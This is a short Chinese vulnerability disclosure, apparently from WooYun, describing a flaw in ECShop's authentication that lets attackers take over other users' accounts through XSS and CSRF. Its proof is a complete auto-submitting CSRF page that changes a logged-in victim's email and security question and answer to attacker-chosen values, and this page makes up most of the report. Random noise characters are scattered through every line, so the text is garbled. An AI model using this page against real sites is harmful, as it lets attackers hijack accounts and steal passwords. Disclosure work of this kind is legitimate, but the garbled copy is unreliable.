简要描述:
% r* l+ H9 A, Mecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
: T4 S/ b3 V8 ^9 w: \. P5 B/ {
2 }7 r( A, E+ fDemo For:http://www.wooyun.org/bug.php?action=view&id=395
# Q. r+ |( e( Z2 K w; [' V, y0 f2 K* y$ C# }
详细说明:* Z0 t, u5 I7 r
利用csrf和xss可以突破官方所说的“障碍”2 k6 i2 X! ^- i8 r, c" f
xss版本已经有人说明
+ Z, I: B) j! r( W/ C这里给出csrf版本
, b/ L. \" f$ C6 ?+ L& }' Z: f/ j% \8 T k+ k. T
漏洞证明:. a* ~) R" Q. D5 ?+ b9 S3 r3 i
<html>4 L" ~2 F0 E% } m- l
<body>3 v, T6 ?! b4 @' W7 `! F, \
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">1 K' A: i0 d U6 z* d+ `5 X
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">/ ^5 A* O* s9 X
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
6 w9 ^6 z ^: G5 [3 \# J; G<INPUT TYPE="text" NAME="sel_question" value="ecshop">
: u$ l; h& U1 {5 \2 q<INPUT TYPE="text" NAME="passwd_answer" value="exploit">/ T4 ], W1 T3 ]7 Q' r3 i- d
</body>. p$ ]# b/ [% L% {( F
<script> ]6 m9 J3 C0 k) s
document.forms[0].submit();
6 K5 |% @& p8 j* h( g& O</script>
) s/ b3 o7 G6 ?9 l7 Y: Q6 A</html>: b* O5 ]# v: B$ a
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失/ u8 e0 c. N' |! [. A, p* e
5 \6 ^+ Y( a5 U5 `7 f- S
|